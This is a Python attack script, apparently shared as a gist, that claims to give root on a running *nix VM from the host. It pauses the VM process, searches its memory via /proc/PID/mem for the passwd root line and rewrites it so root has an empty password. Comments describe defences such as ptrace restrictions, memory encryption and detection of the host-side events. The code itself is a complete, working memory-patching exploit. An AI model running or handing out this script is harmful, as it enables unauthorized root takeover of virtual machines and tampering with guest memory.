Get root on any running *nix VM by patching its memory from the host.
#!/usr/bin/python3
# Rewrites a passwd-format root entry found in another process's memory by
# writing through /proc/PID/mem (the gist description says the intended
# target is a VM process, so the bytes presumably belong to guest RAM —
# not verifiable from here).
#
# Defender notes: the usage text itself states root is required, and on
# Linux open()/write() on /proc/PID/mem is subject to the kernel's ptrace
# access-mode checks, so restricting ptrace scope (Yama) and CAP_SYS_PTRACE
# on the host is the first control. For VMs, guest memory encryption
# (confidential-VM technologies) is what removes the host's ability to read
# or patch guest RAM at all. Host-side, a root process opening
# /proc/<pid>/mem for writing and the SIGSTOP/SIGCONT pair sent to a VM
# process are the observable events.
import sys
import os
import signal

# Search bytes and a replacement of the SAME length (15 bytes each): the
# password field of a passwd-format root line is blanked. Equal length
# matters because the buffer is written back in place below.
PATTERN = b"root:x:0:0:root"
REPLACE = b"root::00:0:root"

# Exactly one positional argument, the target PID, is accepted.
if len(sys.argv) != 2:
    print("USAGE: python3 {} PID".format(sys.argv[0]))
    print("(root privs required)")
    exit()

pid = int(sys.argv[1])

# Freeze the target for the duration of the scan; it is resumed at the end.
os.kill(pid, signal.SIGSTOP)
# /proc/PID/mem opened for read and write.
mem = open("/proc/{}/mem".format(pid), "wb+")

# Walk every mapping listed in /proc/PID/maps, skipping the kernel-provided
# vvar/vdso/vsyscall regions and the stack.
for mapping in open("/proc/{}/maps".format(pid)).readlines():
    if mapping.strip().split()[-1] in ["[vvar]", "[vdso]", "[stack]", "[vsyscall]"]:
        continue
    # First whitespace-separated field is "start-end", both hex.
    addrs = mapping.split()[0]
    start, end = [int(x, 16) for x in addrs.split("-")]
    mem.seek(start)
    # Scan the mapping in 0x1000-byte (4 KiB) steps; any OSError from a
    # read or write is swallowed and the loop moves on.
    for block in range(start, end, 0x1000):
        try:
            buf = mem.read(0x1000)
            if PATTERN in buf:
                # Report the mapping that matched, then overwrite the chunk
                # at its own offset with the substituted bytes.
                print(mapping.strip())
                print("w00t")
                buf = buf.replace(PATTERN, REPLACE)
                mem.seek(block)
                mem.write(buf)
                print("w00tw00t")
        except OSError:
            pass

# Resume the target.
os.kill(pid, signal.SIGCONT)